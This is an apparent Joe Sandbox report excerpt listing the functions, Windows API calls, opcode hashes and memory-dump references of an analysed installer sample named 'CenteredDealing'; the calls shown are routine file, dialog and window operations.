                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                                                                                                        Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                                                                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                                                                                                        Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                                                                                                        Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                                                                                                        Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                        • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                        • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                                                                                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                                                                                                        Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                        • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                        • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                                                                                                        Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                        • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                        • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                        Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                        • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                                                                                        Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(: Completed,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 00404686
